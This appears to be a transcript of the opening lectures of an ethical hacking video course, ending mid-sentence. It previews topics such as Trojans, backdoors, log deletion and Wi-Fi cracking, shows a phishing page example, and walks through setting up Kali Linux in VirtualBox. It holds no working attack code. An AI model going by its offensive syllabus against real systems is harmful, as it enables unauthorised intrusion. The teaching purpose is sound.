Hello! I'm super excited to start this course with you, but as always, before we do, we need to see where we're starting and where we're ending up so we have a clear path to succeeding. So let's see what this course will look like for you. We're first going to start off with creating our hacking lab. Now don't worry, whether you're on Windows, Mac, or Linux, you're going to be able to follow, because what we'll do is use something called a virtual machine to install Kali Linux, which is often used with ethical hacking, onto our machine so that we can simulate and create our hacking environment. Don't worry, all the tools we're going to use is free, and you're going to be able to set up your computer in a way to follow the rest of the course. And you're also going to have a professional setup. We're also going to cover some basics on hacking, some fundamentals and principles that's going to set us up for success later on in the course. Then we have an optional part. For those that really want to get into programming as well and possibly programming some of our projects later on in the course, we're going to teach you Python from scratch, or if you know Python already, as a refresher, so that you can also learn an extra pair of skill set for some harder projects that we have in the course. Then we get into the fun part. And the first step we're going to dive into after we have our hacking lab and some of our programming skills sharp is reconnaissance. Here is where we learn what we call footprinting, or in other words, information gathering. Once we choose our target, our first task is to gain as much information about the target as possible. We're going to talk about IP addresses, about the Whois tool, the WhatWeb stealth scan, finding usernames, building an email scraper tool, and other tools available to us to gather as much information as possible. From there, we go into scanning, and this is where things get real. In this section, we gather information on some of the technical information that we can acquire from a target. For example, if they have open ports, if they have a firewall, what software they're running on these ports, and if they have any outdated operating systems. And don't worry, if you don't know what any of this means, we take you from scratch and you're going to learn it all. Here is where we learn about TCP, UDP, using the powerful Nmap tool, different types of scans that we can do, how to work with firewalls, using decoys and packet fragmentation. And we're also going to build a port scanner project in this section. From there, we go into vulnerability analysis. In this section, we use the information that we gathered from the previous sections, and with this information, we try to determine whether there's a known vulnerability that we can take advantage of. We're going to use different sorts of tools to learn about our target system and where their weaknesses are. We're actually going to work on a Windows 7 machine that has a vulnerability and show how we can break into it and how we can use that to our advantage. Then, well, this is the exciting part. This is the big part of the course. This is where we attack and gain access to the target machines. And throughout this session, we'll be covering many different vulnerabilities and different targets. We perform different sorts of attacks on virtual machines and cover a very important tool of an ethical hacker, that is the Metasploit framework. The goal of exploitation is to get on a target machine. So this means we must drop a payload on that target machine so we can use it to navigate through their systems, look through their files, execute anything we want, even delete anything we want without the target knowing anything about it. We'll learn to create our own viruses and Trojans that we can deliver to the target, whether through an email or through a USB. This is a big section, and we're going to dive into the weeds, try out these techniques, and learn how to defend against them. After that, we have what we call the post-exploitation. This, as the name suggests, is what we do after we exploit a target. Since we're on that machine, we can do many things depending on what we want to get out from it. At the end, after we do all the things we wanted by exploiting the target, we want to make sure we cover our tracks by deleting any event logs or deleting any evidence that we were ever on that machine. We're going to learn lots of things here, such as creating persistence on a target machine and even creating a backdoor in one of our projects. We then get into a very important part that a lot of you might find very, very interesting, and that is website penetration testing. This is a big topic for an ethical hacker, and in this section, we're mainly targeting websites and their bugs and vulnerabilities. These vulnerabilities can be anything from misconfigurations, SQL injections, information disclosures, command ejections, cross-site scripting attacks. And we're also going to code our own and create our own project, a login brute force script, and also a directory discovery tool. Again, in this section, you're going to learn how to use these techniques and therefore defend against them on your own website or a client's website. Then we get into something that you have to know as an ethical hacker. It's the man-in-the-middle attack. This is an attack that is used inside a network, and this allows us to sniff any unencrypted data and see it in plain text. So we could use this technique to see passwords for some websites. And we're going to cover some of the main tools that hackers use when doing a man-in-the-middle attack. We then have a bonus section on Wi-Fi and wireless cracking. This is the section where we want to gain access to a network by cracking its wireless password. And we're going to talk about things like AirCrack password cracking and Hashcat password cracking, and show you how you might use this and how attackers might use this on your wireless network. Now, we got lots to cover, but I also want to talk about the best part right here. Our online private community of over 300,000 students. We have people chatting here every day, helping each other out to finish the course, doing challenges together, and talking about the latest and greatest in technology. This is an optional resource for you to use so you can have back and forth conversation with other students and myself so you feel like you're part of a real classroom. But you know what? Enough talk. I know you're getting excited. I am too. So let's get started and let's learn ethical hacking.
Welcome to the complete ethical hacking course. In this course, we will be covering everything you need to know as an ethical hacker, from theory to the practical examples. We will start with basics first, and the further we go in the course, the more intermediate and advanced stuff we will cover. Knowing theory and practicing different attack methods that we will learn will eventually make you a master in ethical hacking. But wait a second. We just started the course and I'm already talking about being a master in ethical hacking. Let's slow down a little bit. What even is ethical hacking? And what does an ethical hacker do? Or you might also wonder, can I get in trouble by doing this? Don't worry. Remember, we are ethical hackers. This means we are hired to hack into a network or a device, or in general, we want to find as many vulnerabilities inside the target system, but not to do bad things. Quite opposite, we want to secure them. An ethical hacker who is hired to find as many vulnerabilities in a certain system is also known as a white hat hacker. Now, I mentioned a word system quite a few times by now. What do I mean by finding vulnerabilities in a system? Well, system can be anything. It can be a network of multiple computers, or it could be just one single computer. It could also be some company's server that they keep their important data on. We could also be targeting a web page or a website. A vulnerability, on the other hand, is anything that could allow someone to have an unauthorized access to that system. We are there to discover them and secure them. But why are we doing this? Well, as you know, there are the bad guys, or also known as black hat hackers. Their goal is also to find vulnerabilities in a system, but not to secure them. Instead, they want to perform malicious activity once they gain access to that system. That is the difference between a white hat hacker and a black hat hacker. A white hat hacker is there to find vulnerability, notify the person that hired him, and let him know of a possible unauthorized access. You can think of us as a cyber police. We are there to protect. A black hat hacker, on the other hand, is there to perform malicious activity such as stealing your data. They could also try to steal your online money. They could install a virus or a keylogger on your PC and track everything that you do. They can go as far as doing something like stealing your identity. However, the methods white hat and black hat hackers use can be quite similar. The difference is we as white hat hackers must make sure that we have a permission to target a certain system. An example would go like this. We get hired by a certain company. That company could have a website, different networks with computers inside the building where, for example, employees work. It could also have large servers and databases holding important company data. And as we already know, our goal is to make sure that data is secured from cyber attacks, that also employees and their machines are also in a secure network, and that website doesn't have any bugs that could present a threat to that company. How do we do all of this? Well, we do it by attacking the company. We act as a black hat hacker would, but with a different goal. Okay, but here we come to another problem. You might be wondering, well, how am I going to learn this? Or how am I going to practice this? I just said that we need a permission to attack any system, right? Well, don't worry. We will simulate all of these targets with the help of our home devices, and also with the help of virtual machines. It will be exactly the same, just this way you won't be breaking any law while you practice, since the targets that you will attack will be yours. Okay, more about virtual machines later. Right now I want to give you a small challenge. One of the biggest online cyber attacks is something called phishing. In most cases, phishing is an act of black hat hackers tricking you into entering some of your private data, such as usernames and passwords, into a web page that isn't to be trusted. This is one of the ways how they steal online accounts. Let me show you. Here I have two Twitter login pages. One of these two that you can see right here is a fake login page, and the other one is real. Let's take a quick look at them. So let's take a look at the first one. Here it is. And if we take a look at the second one, they appear to be exactly the same, right? Have you figured out which one is real and which one is fake? The first one that we saw is the fake login page, while the second one right here is real one. Let's mention some of the obvious reasons why this page right here that you're looking at is a fake login page that can be used to steal your account. Even though they are identical at first glance, if we take a closer look, we can see it doesn't really have twitter.com as the website name. Instead, we have some random IP address in our search tab, and this is the biggest indication that this page is indeed a fake page and that you shouldn't enter any private information here. The original page should be twitter.com. Another thing we can notice is that next to the website name, on a real page, we have this green lock right here. And this green lock indicates that this is an HTTPS page, or in other words, it is secured, as it says right here, secure connection. Usually phishing websites won't be HTTPS and they won't have this green lock right here. However, this too can be forged in a more advanced phishing attack. And just to compare, our fake login page doesn't have this green lock. If we click right here, it says connection is not secure. And even though many of you probably knew these things already, if you were in a hurry and you got redirected to this fake login page, you could potentially enter your password here, and little do you know, in just a few seconds, your account has been compromised and stolen by the bad guys, since the information that you enter right here on this page gets sent to them and not to twitter.com. But don't worry if you aren't familiar with these type of attacks. Throughout the course, we will learn not only how to secure ourselves from these attacks and how these attacks work, but also we will learn how to perform the attacks themselves. And by the way, we also have a Discord channel where we answer your questions, so if you haven't already, feel free to come and join us in Discord, since that is where we notify everyone about any new course updates that will come out, and that is also where you can reach out to us in case you run into any problem during the course. Nonetheless, I welcome you once again, and let's get straight into the course. Okay, so what is a virtual machine? This is something that I mentioned in the previous video, but it is important for us to fully understand what it is. I can just give you a definition and say virtual machine is a machine within our physical computer that is using its hardware resources. But for most of you, this will be a new term that you haven't really encountered before. So I would like to explain it furthermore for you, as well as mention why are we going to use it. Let me start like this. All of us are running an operating system, and 99.9% of us are running one of the three main operating systems. You either have Windows, Mac OS, or Linux. Most of you will have Windows or Mac OS. I doubt anyone will be running Linux, but nonetheless, these are the three main ones. But what if we wanted to run two different operating systems on the same machine? Can we do that? For example, let's say you have Windows installed on your physical machine, but you want to install Linux too. Or even better case, you want to install 5 operating systems running on different virtual machines. Can you do that? You can. How would that work? Well, picture it like this. Imagine these 4 lines representing our computer. And we already know that any computer will have one of the 3 main operating systems: Windows, Mac OS, or Linux. But operating system is not the only thing defining our machine. Our machine also has its computer parts. We have hard disk, processor, RAM memory, motherboard, and many more computer parts that with the operating system make our machine work. These computer parts are also known as hardware. But wait a second, Alexa. Why are you telling us this? Thought this was a lecture on explaining how virtual machines work, and not on hardware components. Well, hang on for just a second. We're slowly getting there. Picture a virtual machine to be this smaller rectangle within our physical machine, which is this larger rectangle. And let's imagine that our physical machine is running Windows operating system. But if you took a look at this course content, you would probably notice that we're going to be doing all of our hacking stuff over Linux. Does that mean that we must delete our Windows and install Linux? Nope. We will install Linux as a virtual machine. And for this machine to work, it will need to have access to our hardware components. What does this mean? Well, since virtual machine will act as a machine of its own, it must have its own computer parts. And what we will do is we're going to borrow our physical machine's CPU power, RAM memory, hard disk memory to our virtual machine so it can run just like our physical machine. In other words, we're splitting the power of our physical machine into 2 different machines, or more, if we decide that we want to create multiple virtual machines. Does that mean that they will be slower since they will be splitting hardware resources? Well, technically yes, but it will not be noticeable for us. However, the more powerful your PC is, more virtual machines it will be able to run effectively. Another important thing is that once you shut down your virtual machine, all of the hardware resources used by it will get freed back for your physical machine to use. Okay, good, but what are other benefits that we have if we create a virtual machine? Well, since we're hackers and we will be doing a lot of things and running a lot of programs on that virtual machine, we want to make sure that we're doing it first in a safe environment, at least while we learn. The good thing about virtual machines is that if, for example, our machine starts getting some annoying error, or we get locked out of our files, or simply we delete a file that we shouldn't have deleted and it crashes our virtual machine. But what if we, for example, get infected by a malware or virus by accident? Or we simply just install the wrong version of operating system, which we don't need. Don't worry, with 2 clicks, we can delete the entire virtual machine with all of its files and it will have no effect on our physical machine. Then we can proceed to create a new one for as many times as we want. We can also create something called a snapshot, which will allow us to save the current state of a virtual machine, and with it, we can revert it back to that state whenever we want. This could be used if we, for example, run into some errors with our virtual machine. Sounds cool, right? Now that we know how virtual machines work, And why are we going to use one? You must be wondering, how can we create a virtual machine? Actually, this is pretty easy. All we need are two things. We need an operating system that we want to install in that virtual machine, and we also need something called virtualization software. Now, what is this? Even though it sounds harsh saying virtualization software, what it essentially is a program that will allow our physical machine to borrow hardware components to our virtual machine. Or we can also define it as a program that will allow us to run multiple operating systems on a single host or a single machine. So with these two combined, we can create our virtual machine, and in the next few lectures, we're going to see exactly how to do that. See you there. Before we actually proceed to creating our virtual machine that we will use for hacking, I believe most of you are wondering, why Linux? Why are we installing a Linux operating system on a virtual machine? Can't we hack using Windows or Mac OS? Well, yes we can, but Linux is something far better for that. So what are the benefits of using Linux? First thing that's great about Linux is that it is an open source operating system. This means that we can inspect the code of it and see how it is made and what programs or functions it runs. It can be used for any type of work, not only for hacking. Many programmers also use Linux. Many servers all around the world are running on Linux. And another great thing about it is that most of the Linux distros are free of cost. Maybe some of you have heard about Ubuntu, Linux Mint, or Debian. Well, to use an updated Windows operating system, you must pay for a license. Linux, on the other hand, is free to download for anyone. And not only that, but it also, due to it being an open source, it allows the users of Linux to edit, copy, or distribute various aspects of Linux-based operating system without violating any copyright law or terms and conditions. This is one of the main reasons hackers use Linux, because they can easily develop softwares used for hacking and penetration testing on Linux, and they can change and edit the operating system for their needs. It is also very light, requires lesser disk space, consumes lesser RAM in order to run, so it can be easily ran alongside any other operating system like Windows and Mac OS. And last but not least is that, as we mentioned, due to Linux being an open source and allowing anyone to change and interact with the operating system, it allows people to create an operating system that will specifically be made for one purpose, such as, for example, ethical hacking or penetration testing. And Linux distros like this already exist. There are Linux distros called Kali Linux, Parrot, Backtrack, and others that are especially made for penetration testing and checking for security loopholes. And all of them are widely being used by hackers. And in this course, we will be using Kali Linux, one of the Linux distros specially created for hackers and penetration testers. What's great about it is that it automatically comes after installation with a bunch of different tools used by penetration testers for hacking. And we're going to cover those tools and go step by step through them, plus we'll be installing tools created by other people, and at the advanced parts of this course, we'll be creating our own hacking tools. How cool will that be? So now that we know exactly which Linux distro are we going to install and what are the benefits of using Linux, in the next video, we can create our virtual hacking lab. Hello and welcome back. So in the previous few lectures, we talked about virtual machines and why we need them for this course. We also mentioned that for creating our virtual hacking lab, we will need a virtualization software as well as an operating system that is used for hacking, which is also known as Kali Linux. Now, let's see where we can download both of these. So let's start off with the virtualization software. For this course, we will be using VirtualBox. Now, VirtualBox is a free virtualization software, and it is quite easy to use, and it's compatible with almost all the operating systems. all you have to do is type in VirtualBox in your search bar, and the first link, which will be virtualbox.org, is the one that we're looking for. So just click on this, Oracle VM VirtualBox at virtualbox.org, and it will lead us to the official page of VirtualBox, where we will see this big download button that allows us to download this virtualization software. So once we click on it, it will lead us to this page where we can choose which platform packages, or in other words, which version of VirtualBox we want to download. Now, these are different versions depending on which operating system you are running. So if you are running Windows, you want to go with Windows hosts. If you're running OS X, you want to go with OS X hosts. If you're on Linux, then you want to go to Linux distributions, and so on and so on. Now, since I'm on Windows, I will be clicking Windows hosts, and this will ask where to download this VirtualBox installation file for our virtualization software. Now, I already have it, so I won't be downloading it, but you want to save it wherever you want. So just save it on your desktop, and once you do that, let's move on to downloading Kali Linux. We can find Kali Linux at kali.org website, which you can just type in your search bar, or you can just type Kali Linux and the first link should open this page. As we can see, it says the most advanced penetration testing distribution, and we get a small description of what Kali Linux is. So let's quickly read it. Kali Linux is an open source Debian-based Linux distribution geared towards various information security tasks such as penetration testing, security research, computer forensics, and reverse engineering. Okay, awesome. To download it, we want to go to either Get Kali or on Download. Once we click on Download, it will lead us to this page where we will have several different versions of Kali Linux available for download. Now, we want to go with installer images. We can also go with virtual machines, but to have it exactly as we do in the course, we want to go with the installer images as our option. So click on installer images, and down here we will see the current version of Kali Linux, which is 2022.3, and it will give us several different options from what we can download. So we have 64-bit, 32-bit, and for the Apple Silicon, M1 and M2 chips. Okay, so depending on what your architecture and operating system is, you want to choose accordingly. Now, since I'm running a 64-bit machine, I want to check right here 64-bit, and I want to choose this installer option. So 64-bit installer, and all I have to do is click it, and it should work. It will ask me where I want to download. Now, once again, I already have Kali Linux downloaded right here, so it's on my desktop. No need to download it twice. For you, just save it on your desktop as you did with your VirtualBox installation file, and you should be good to go. Now, if you're by any chance on a 32-bit machine, you want to select 32-bit and go once again with the installer. Or if you are on M1 chip or M2 chip on MacBook, then you want to select Apple Silicon and proceed with the installer. However, if you are on Intel Mac, or if your MacBook doesn't have an M1 or M2 chip, but rather has an Intel processor, then you want to once again go with 64-bit, just like I did. Now, quick little note for anyone using Apple Silicon M1 or M2 chip, VirtualBox will not work for you, so for you instead, you want to go with UTM. Now, UTM is only for the people that are using a MacBook with M1 or M2 chip. If you're using any other device, you're going with VirtualBox. And one more thing, this is the current version of Kali as we already mentioned, but in case you want to download any older version, you can go to old.kali.org, base images, and here you will have all the versions that were released before. In this particular course, we are using the 2020 version, but it doesn't really matter. I do advise you to download the latest version of Kali Linux whenever you can. So if at the point of you watching this tutorial it's 2022.3, go with that version. If there is a newer version available, go with the newest version instead. Nonetheless, thank you for watching, and I will see you in the next lecture. Okay, so here we are. We are ready with both of our files on our desktop. The first thing that we want to do is we want to install VirtualBox software. In order to create virtual machine, we must first have the software installed, so let us do that first. If we double click on it, it will start the process of installation, which should look the same whether you're running Windows, Mac OS or Linux. The process of installation VirtualBox will be the same. And it is rather easy, since all we want to do is we want to click on next on each and every step, but just so we don't go next, let us explain what you can do with each and every step of installation. So here, as it says under the custom setup, we want to select the way we want our features to be installed. And the only thing that you might consider changing right here is this location part. If you want to change the location of VirtualBox, you can do that right here, but since I won't be doing that, I will just click on next to proceed to the next step. Here you can select whether you want a shortcut on the desktop, whether you want start menu entries. I will leave all of this to be checked since I want all of that, and I will click on next step. For this step, it says that during the installation we might be disconnected from the internet in case you're downloading or uploading something important, so best thing you can do in that case is wait for that download or upload to finish, and then you can proceed with the installation of VirtualBox. So I will just click on yes, since I'm not doing anything important over the internet, and I will click right here on install. This will ask me for my administrative password, and since I don't have one, I will simply just click on yes, and it will start the process of installing VirtualBox. This will finish in just a few seconds, and right after it, it should open up our VirtualBox. So just at this last step after installation, we want to click on finish, and in just a few seconds, this should open the VirtualBox. And here it is. So your window should look exactly like mine does, and what we want to do from here is we want to create the virtual machine. We're going to go onto this new button and click on it, which will open this small window that will ask us for some information about our virtual machine. So under the name, we're going to specify Kali Linux, and you can name it anything you want. It doesn't have to be Kali Linux, but just in case you might have multiple machines in VirtualBox later on, you want to have them named properly so you know which machine is which. Next thing, the machine folder is something that we don't want to change. The type we want to set on Linux, and you will notice if you typed Kali Linux, it should automatically set the type to be Linux. And the version is something that we do want to change. Now, since Kali Linux is a Debian-based operating system, we want to be searching Debian right here. And here it is. We got Debian 32-bit and Debian 64-bit. If you downloaded the 64-bit version of Kali Linux, you want to select right here Debian 64-bit. And if you downloaded the 32-bit one, you would be selecting Debian 32-bit. After we got all of these options set like this, we want to click on next. And this next step is, if you remember, we talked about that we need to give our hardware resources to our virtual machine. And right here it asks us how much RAM memory are we willing to borrow to the virtual machine to use. This RAM memory will not be available as long as our virtual machine is running, and once the virtual machine has been shut down, this RAM memory will be freed for our physical machine to use. Now, on this machine that I'm recording, I have 8 GB of RAM. So, in the best case, I want to give about 2 GB of RAM to this virtual machine. Now I can also go up to 4 GB of RAM, but it is not really needed, and there is no point in giving half of your RAM memory to your virtual machine. So 2 GB of RAM will be more than enough for my virtual machine. If your machine has 16 GB of RAM or 32 GB of RAM, feel free to give it even more RAM memory, as the more the better. And if your machine has less than 8 GB of RAM, for example it has 4 GB of RAM, then you can either go with 2 GB or you can even lower it to 1 GB of RAM. But I will simply just leave it on 2, and I will proceed to the next step. In the next step, we're creating the hard disk, so we want to select this option that says create a virtual hard disk now. And keep in mind that the recommended size of the hard disk is 8 GB. This option will come later on, but just keep it in mind. So create a virtual hard disk now, click on create, and under the hard disk file type, we want to select VirtualBox disk image. Click on next. This next question is asking us how we want to store our data on our virtual hard disk, whether we want fixed size or dynamically allocated. Keep in mind that fixed size will probably work faster, but it will also take longer time to create, while the dynamically allocated might work a little bit slower, but it will be created a lot faster. It is completely up to you. In this case, I will simply just go with dynamically allocated and I will click on next. And here is where we choose the virtual hard disk size and the file location. So here you can change the location of your virtual hard disk or simply of your virtual machine. And down here you can select how much gigabytes you want to give to your virtual machine to use as a hard disk. It said before that 8 GB is recommended, but I would advise you to not go below 20 GB. For the purposes of this course, I will even go up to 30 GB, but you don't really have to if you don't want. Just keep in mind that you might be using this machine later on, even after this course, and you might be downloading more and more files, so if you can, make sure to give it more than it is recommended. Once you select your hard disk size, you want to click on Create. And this will create our virtual machine. As you can see right here, we got Kali Linux added, and here are all of the details about our virtual machine. Before we proceed and start it, there is only one more thing that we want to do. Remember this ISO image or this operating system? We need to somehow add it to our virtual machine, so that once we install the operating system, it knows which one to install. So to do that, we navigate back to VirtualBox, we select the virtual machine, and we click on Settings. Now you will notice that there are a bunch of settings right here, which we are going to explain later on, but for now on, you want to navigate to the storage, and here is where we want to add our ISO image of Kali Linux. To do that, we want to go to this controller IDE, and this empty part, we want to right click and remove attachment. It will ask us, are we sure that we want to delete it? We click on remove, and after it, we want to click on this disk shape with a plus. Just click on it, and it will open up this smaller window where we want to find our Kali Linux ISO image and select it. In case you don't see it right here, you want to click on Add, and you can simply just find it on your machine. In my case, as we can see, it is right here in the download section, but in your case, if you moved it to a desktop, it will probably be on desktop as well. Since I have it in both locations, I will select the desktop one, double click it, and you will see it being added right here. Then you select it here, and click on Choose. You should see it being added right here under the controller IDE, as it says Kali Linux 2020.2. And once you see it, you can simply just click on OK. And now our virtual machine is fully created. All we are left to do in the next video is to install the Kali Linux operating system. After that, we're going to be ready to use our hacking machine. Okay, finally, we got to the part where we will install our machine with all the interesting hacking tools that we will use. Hopefully, you're excited since by the end of this video, you will have your Kali Linux machine running and ready to use. Here in our VirtualBox, in order to start the process of installation, we must first select our virtual machine and then click on this Start button right here. This will start our virtual machine and it will start the process of installation of operating system. Okay, so let me enlarge this, even though the screen of the installation will stay smaller size, but that is just during the installation, so don't worry. And right here in the installer menu, we're interested in two different options, either graphical install or install. They're pretty much the same, just graphical install is prettier, so that's why we are going to go with that one. Click here Enter. The next thing it asks us is to choose the language, and for the purposes of this course, I will proceed with English, and you can pick whichever language you want. So just select whichever language you want. I will select English and I will click on Continue. In the location part, this is only important if you want to have the correct time zone correspondent with your country. And right here, it also tells us that these countries from which we can choose are strictly based on the language that we picked in the previous step. So in case your country is not on the list, like mine isn't, you can go right here on Other and select your country. If it is on the list, select it and click on Continue. Now, since this really isn't that important step, I will just proceed with the United States. And here under the configuration of the keyboard, I will select American English and I will click on Continue. After setting up our keyboard, the installation process will configure some stuff required for our machine to run, and you will notice most of the stuff is done automatically, so we don't need to worry about it too much. Whenever a certain question pops up, I will tell you what you need to select to proceed to the next step of installation. Okay, so after a few seconds, here is the first question. Let us read what it wants from us. So it says, please enter the hostname for this system, and the hostname is a single word that identifies your system to the network. If you don't know what your hostname should be, consult your network administrator. If you're setting up your own home network, you can make something up here. Okay, so we're not network administrators, therefore we can just make something up as a hostname, so let us just go with Cali. Why not? And let us go on Continue. Domain name, this is something that we want to leave empty, so just delete everything right here and proceed to the next step. Okay, so we got setup users and password step. Now, in the previous versions of Kali Linux, it usually asked you to set up the password for the root account. And unlike, for example, on Windows, we got the user accounts and administrator. On Linux, we got the user accounts and a root account. What a root account is basically the same as an administrator in Windows. It has elevated privileges, it can execute commands that user's account cannot execute, and in this newest version of Kali Linux, we are required to set up a user account. So here we got the step where we need to specify full name for the new user, and it tells us that specifying our full name would be a reasonable choice, and if it was any other course instead of a hacking course, I would also tell you to specify your name here. But I must teach you to also think like a hacker, and we hackers want to stay as low-key as possible, so specifying our real name is not an option for us here. We can just make something up instead. Let us go with Mr. Hacker. Why not? Let's click on Continue, and the username we can also leave to be Mr. Hacker. There's nothing really to change here. Of course, if you want, you can specify something other than Mr. Hacker. It is completely up to you. Just make sure you remember the username, since you will need it to log into your machine after the installation. So I will leave it on Mr. Hacker and click on Continue. And here is a step where we need to choose a password. Now, password is the important stuff. We must make sure we choose a strong password for any type of account we create. Let me tell you one interesting fact. A lot of black hat hackers were caught because they had a weak password. We are white hat hackers, but it is still a good practice to always choose a long and strong password. So let us do it. I will type mine right here and re-enter the password. I will type it once again. You can choose any password that you want. In case you want to make sure that you typed what you wanted to type, you can click right here, Show Password in Clear, as well as in the second step, you can also check Show Password in Clear. And after you choose your password, you can click on Continue. So here, configure the clock. You can select your time zone. I will go with Eastern. And here, after loading a few more additional components, it should ask us about disk partitioning. Here in the partitioning disk, we have a few options, and we're interested in the first one, which is guided to use entire disk. We're not really interested in encrypted hard disks or anything like that, so just select Use Entire Disk and click on Continue. Here we get a warning that all data on the disk you select will be erased. And this right here is a hard disk that we created in the previous video when I created my virtual machine. And you remember that I gave around 30 gigabytes to my virtual hard disk, so this is that one, and I will select it and click on continue. Here it gives us some of the options as to how the disk can be partitioned. We will proceed with first option, which is all files in one partition, which is also recommended for new users. Don't worry about these other two options which mention /home, /var, /tmp. These are all just standard Linux directories, which we will see shortly after installation. So just click right here, all files in one partition, click on continue. The final steps are finish partitioning and write changes to the disk. We want to click on continue there as well. And right here it will just ask us, are we sure that we want to write the changes to the disk? We want to select right here yes, and we want to click on continue. So after clicking on continue, the installation process will start and it will take some time. It can take possibly around 20 to 30 minutes, maybe even longer, and it will also ask us a couple more questions in meantime. I will fast forward to the first question that pops up, and you just pause the video until you get to that step of installation. Okay, so here is the next question, configuring the package manager, and it asks us for the HTTP proxy information. Leave blank for none, and we do want to leave blank, so we're not going to type anything here, and we're going to click on continue. Here in the software selection, we want to leave all of the checked things, and we also want to add the large option. So leave everything checked that you see right here, and click right here on large. What this will do is it will install additional tools in our Kali Linux, and we want as many hacking tools installed with our operating system, so we don't have to waste time installing them later on. So just double check that all of these options are checked, desktop environment, XFCE, these lower three, and the large option as well should be checked. After you get all of that, click on continue. And this step of installing software will take some time. So just go grab a cup of coffee or take some snack, and I will see you in around 20 to 30 minutes. Okay, so after a long installation, here is another question. And it asks us, should we install the grub bootloader to the master boot record? First of all, what is grub? Well, grub bootloader is a software that loads Linux kernel. It is the first software that is started at system boot. Let us read what it asks us here. It seems that this new installation is the only operating system on this computer. If so, it should be safe to install the grub bootloader to the master boot record of your first hard drive. Warning: if the installer fails to detect another operating system that is present on your computer, modifying the master boot record will make that operating system temporarily unbootable, though grub can be manually configured later to boot it. We want to click here, yes. And you might be asking, wait Alexa, but I'm running other operating systems. I'm running macOS or Windows. Don't worry, remember, this is a virtual machine. It doesn't know about your main operating system. For this virtual machine, this is the only operating system that is being installed. So it is safe to select yes and proceed to the next step. And in here, we want to select /dev/sda and click on continue. This will proceed to finish up our installation, and it might ask us a question or two more, and then we should be ready to use our Kali Linux machine. Okay, and this final step says installation complete, so it is time to boot into your new system. Make sure to remove the installation media so that you boot into the new system rather than restarting the installation. Since we don't have any installation media, and this is probably referring to a USB drive in case you installed an operating system over USB, and we didn't, we installed it in virtual machine, so we can simply just click on continue. This will finish up the installation, and then it will reboot our machine and open up our Kali Linux desktop. Here it is, our virtual machine is starting up for the first time. Finally, here is our login screen to our Kali Linux machine. Here we want to input the username that we typed in during the installation, so in my case it is Mr. Hacker. And down here you want to input the password that you used during the installation. Then you can click on Login. And here it is, our first hacking machine. Now, in case you're wondering why is it smaller screen, well, to fix that, in most cases you can simply just do this, lower the screen, and then enlarge it once again, and now it should be in full screen mode. In case this didn't work, don't worry, in the next video we're going to perform some of the checks of our virtual machine to check the internet connection, whether it is in full screen mode, and other things as well. So don't worry if your machine isn't in full screen mode, it will be after the next video. Okay, just a quick little update video that we do every time a new version of Kali Linux comes out. And a few days ago, on the 9th August 2022, we got a 2022.3 release of Kali Linux operating system. Now for this particular release, there are not many new things, so everything is pretty much the same. There are no changes at all compared to the previous version, except some minor changes that we can read about under this blog on the official Kali Linux page. So you can navigate to this 2022.3 release under the blog, and you can read about all the new things that they did inside this version. So they made a few changes for Kali for virtual machines. They added some new tools, so feel free to check out these tools if you want. And that would pretty much be about it. There are some other minor changes such as Kali ARM updates and Kali NetHunter updates, but nothing important for the course. So feel free, as I always advise, to install the newest version that you see on the official page. But just in case, if you want to install an older version or the version that we use in the course, you can go to the all.kali.org, and under the Kali images, you will see all the previous releases of Kali Linux, and you can feel free to download whichever one that you want. If we also take a look at the Kali Linux 2022.3 inside VirtualBox, there are not many changes compared to the previous version. Matter of fact, I don't see any change. The wallpaper looks the same, everything visual looks the same. So we can say it's rather similar to the previous release. Nonetheless, let's not waste any more time. Once again, if you want to read about the new release, go to this article, and if you don't want to, that's okay. You can feel free to proceed to the next lecture. See you there. Alright, we got our hacking machine running and ready to use. Before we get to explaining all of the stuff you see on the screen, first we need to make sure our machine is working properly. So we'll just go through a few checks. The first check that we want to do is your machine in full screen mode? Now, in the previous tutorial, I showed you what you can do to get it in full screen mode, and all you need to do is minimize this screen and maximize it once again, in case it already wasn't in full screen mode. And that is because newest versions of Kali Linux automatically set your machine to be in full screen mode without installing any additional tools for that. Usually this trick should work. And if it didn't work and your machine is still not in full screen mode, then we need to install something called VirtualBox Guest Additions. And I would advise all of you to do it even if you already have a full screen mode machine, because guest additions will not only help us with getting our machine to be full screen, but they will also make our machine run smoother and better. In previous versions of Kali Linux, we always had to install VirtualBox Guest Additions to get the full screen mode, so let us see how we can do that in the newest version as well. First we need to do is we need to go up here and click on Devices, then navigate down to the Insert Guest Addition CD image and click on that. They should get imported, and in just a few seconds we should see a disk icon on our desktop. If we double click it, it will open a folder where we will see a bunch of files and other directories. Don't worry, we don't need to know what each of these files are or what do they do. The only thing we need to remember is the path to where these files are. And up here we can see that these files are located at /media/cd-rom0. So let us copy this. If we right click, copy. Now comes the fun part. We have to open something called terminal. And terminal is something that we will use for the entire course. It is the most important tool you need to master as a hacker. But for now, just follow what I do and we will explain things as we go. To open a terminal, right click on your desktop and click on Open Terminal here. It will open this window where we can execute our commands. And once again, since terminal is an important tool that you must master and learn from scratch, we will cover it in the next section in greater details. For now on, we just want to install VirtualBox guest editions. The first thing that we want to do is we want to navigate to that path that we copied. And to do that using terminal, we must use a command called cd. This cd command stands for changing directories, and you can see that we are currently on the desktop directory, which says right here. To change the directory, we type the cd command and then we paste the path where we want to go. So change directory /media/cd-rom. Press enter and you will see that in the next line we will be changing directories to the desired folder. Now, to list all the files inside of this directory, we need to type another command which is called ls. What this command stands for is simply just listing the contents of the current directory. So you can just remember ls to be a short command for list. If I press here enter, we will see a bunch of the files that are located in the current directory. These files are actually the files that we saw once we opened these VirtualBox guest editions. You can see these are the same files. Right now we are just there inside of our terminal. And out of all of these files, now we must run one of them. Can you guess which one? We know that we can't run the exe files since those are aimed for Windows systems and we are on a Linux system. But we can, however, run this one called VirtualBox Linux editions.run. If you guessed that one, congrats! This is the one that we will run. To run it, we can use a command that says sh VirtualBox Linux editions.run. And this sh is just a way for us to actually run this file, which we are also going to explain once we get to explaining terminal in greater details. For now on, if we press enter, this program must be ran with administrator privileges, aborting. For now, don't think about this and just run the following command. Sudo sh VirtualBox Linux editions.run. If we press enter here, you should get a prompt like this asking you for your password. Then type in your password. And keep in mind that even while you're typing, you will not be able to see anything appear right here, which doesn't mean that you're not typing. You are typing, just it doesn't show anything inside of the terminal. Once you typed in the password, click enter. And it will ask us, do we want to continue with the installation? We want to specify right here, yes. And it will start the process of installing VirtualBox guest editions. Now, you will notice that this entire process will be performed automatically. We do not need to do anything anymore. This will install on its own. And don't worry if there is a part of this entire process that you did not understand. We will discuss all of these commands and tools later on. This installation right here will take a minute or two, so let us just wait for that to finish. Okay, so it has finished, and we can see right here that it tells us running kernel modules will not be 